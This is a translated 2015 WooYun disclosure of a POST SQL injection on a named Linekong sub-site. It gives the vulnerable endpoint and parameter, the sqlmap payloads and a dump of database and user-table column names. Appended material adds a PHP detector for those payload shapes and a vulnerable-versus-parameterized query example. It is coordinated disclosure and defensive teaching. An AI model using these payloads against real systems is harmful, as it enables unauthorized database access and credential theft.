
Vulnerability summary

Defect ID: wooyun-2015-0119668

Title: SQL injection (POST) on a Linekong sub-site

Vendor: linekong.com

Author: 路人甲

Submitted: 2015-06-11 11:23

Fixed: 2015-07-30 09:54

Published: 2015-07-30 09:54

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-06-11: Details sent to the vendor; awaiting vendor handling
2015-06-15: Vendor confirmed; details disclosed to the vendor only
2015-06-25: Details disclosed to core white hats and domain experts
2015-07-05: Details disclosed to regular white hats
2015-07-15: Details disclosed to intern white hats
2015-07-30: Details disclosed to the public

Brief description:

See title.

Detailed description:

http://ms.linekong.com/activity/clan3/_do_getPlayerList.ajax.php
POST parameters: ghId=1&page=1


[Screenshot: 2.JPG]


sqlmap identified the following injection points with a total of 59 HTTP(s) requests:
---
Parameter: ghId (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ghId=1 AND 2207=2207&page=1
    Vector: AND [INFERENCE]

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: ghId=1 AND (SELECT * FROM (SELECT(SLEEP(5)))RqfN)&page=1
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: ghId=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a717671,0x6e79465266636b4b4753,0x716b627871)-- &page=1
    Vector: UNION ALL SELECT NULL,NULL,[QUERY]--
---
web application technology: Apache
back-end DBMS: MySQL 5.0.12
available databases [2]:
[*] information_schema
[*] ms_web
Database: ms_web
[57 tables]
Database: ms_web
Table: ms_member
[26 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| address_id     | int(11)      |
| article_id     | int(11)      |
| group_id       | int(11)      |
| id             | int(11)      |
| image_id       | int(11)      |
| nickname       | varchar(64)  |
| uadd_time      | datetime     |
| url_id         | int(11)      |
| user_age       | date         |
| user_Dreply    | int(11)      |
| user_Dtopic    | int(11)      |
| user_email     | varchar(32)  |
| user_grading   | varchar(64)  |
| user_jointime  | datetime     |
| user_like      | varchar(255) |
| user_movephone | varchar(32)  |
| user_msn       | varchar(128) |
| user_name      | varchar(32)  |
| user_passwd    | varchar(32)  |
| user_perfect   | int(11)      |
| user_qq        | int(11)      |
| user_sex       | int(2)       |
| user_state     | int(2)       |
| user_Treply    | int(11)      |
| user_Ttopic    | int(11)      |
| vote_id        | int(11)      |
+----------------+--------------+
Database: ms_web
Table: ms_member
[16 entries]
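As an added example, not part of the original report: a small PHP check that classifies form-encoded POST bodies against the three payload shapes the sqlmap output above shows (boolean inference, SLEEP()-based timing, UNION extraction), run over constructed sample bodies. The signature labels and the function name are assumptions; this is a logging/alerting signal for the request path, not a replacement for parameterized queries.

```php
<?php
// Signatures for the three technique classes visible in the sqlmap output:
// boolean-based inference, time-based blind via SLEEP(), UNION-based extraction.
const SQLI_SIGNATURES = [
    'boolean-based blind' => '/\b(AND|OR)\s+\d+\s*=\s*\d+/i',
    'time-based blind'    => '/\bSLEEP\s*\(\s*\d+/i',
    'union-based'         => '/\bUNION\s+(ALL\s+)?SELECT\b/i',
];

// Decode a form-encoded POST body (parse_str already URL-decodes the values)
// and return the matching signature labels keyed by parameter name.
// A clean request yields an empty array.
function classifyPostBody(string $body): array
{
    parse_str($body, $params);
    $hits = [];
    foreach ($params as $name => $value) {
        if (!is_string($value)) {
            continue; // nested array parameters are out of scope here
        }
        foreach (SQLI_SIGNATURES as $label => $regex) {
            if (preg_match($regex, $value)) {
                $hits[$name][] = $label;
            }
        }
    }
    return $hits;
}

// Constructed sample bodies: one benign request and the three payload shapes
// from the report (the UNION payload is shortened to the same structure).
$samples = [
    'ghId=1&page=1',
    'ghId=1 AND 2207=2207&page=1',
    'ghId=1 AND (SELECT * FROM (SELECT(SLEEP(5)))RqfN)&page=1',
    'ghId=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71,0x6e)-- &page=1',
];
foreach ($samples as $body) {
    $hits = classifyPostBody($body);
    printf("%-62s %s\n", $body, $hits ? json_encode($hits) : 'clean');
}
```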

Proof of vulnerability: (the same sqlmap output as in the detailed description above)


Fix recommendation:

Filter the input parameters.

Copyright notice: please credit the source when reposting: 路人甲@乌云
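As an added example (not code from the report or from Linekong), the string-concatenation pattern that produces this class of bug, beside a hardened version of the same handler that validates both inputs as integers and binds them through PDO prepared statements. The table and column names, the page size and the function names are assumptions made for illustration.

```php
<?php
// Vulnerable pattern (reconstructed for illustration, not the site's code):
// the raw POST values are spliced into the SQL text, so a value such as
// "1 AND 2207=2207" or "1 UNION ALL SELECT ..." becomes part of the query.
function getPlayerListUnsafe(mysqli $db, array $post)
{
    $ghId   = $post['ghId'];
    $page   = $post['page'];
    $offset = ($page - 1) * 20;
    $sql = "SELECT id, nickname, score FROM ms_activity_gh_member"   // assumed table
         . " WHERE gh_id = $ghId ORDER BY score DESC LIMIT $offset, 20";
    return $db->query($sql);
}

// Hardened version: reject anything that is not a positive integer, then bind
// the values as typed parameters so they can never change the query structure.
function getPlayerList(PDO $db, array $post): array
{
    $ghId = filter_var($post['ghId'] ?? null, FILTER_VALIDATE_INT,
                       ['options' => ['min_range' => 1]]);
    $page = filter_var($post['page'] ?? 1, FILTER_VALIDATE_INT,
                       ['options' => ['min_range' => 1, 'max_range' => 1000]]);
    if ($ghId === false || $page === false) {
        http_response_code(400);   // malformed input is an error, not a query
        return [];
    }
    // Native prepares keep the parameters out of the SQL text entirely.
    $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    $stmt = $db->prepare(
        'SELECT id, nickname, score FROM ms_activity_gh_member'       // assumed table
        . ' WHERE gh_id = :ghId ORDER BY score DESC LIMIT :offset, 20'
    );
    $stmt->bindValue(':ghId', $ghId, PDO::PARAM_INT);
    $stmt->bindValue(':offset', ($page - 1) * 20, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}
```

The column listing above also shows user_passwd as varchar(32) next to user_email and user_movephone; once the injection is closed, the same handler review should confirm that stored credentials use a salted, slow hash rather than a bare 32-character digest.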


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed at: 2015-06-15 09:52

Vendor reply:

Thank you for pointing out the issue; it has been forwarded to the developers for handling.

Latest status:

None

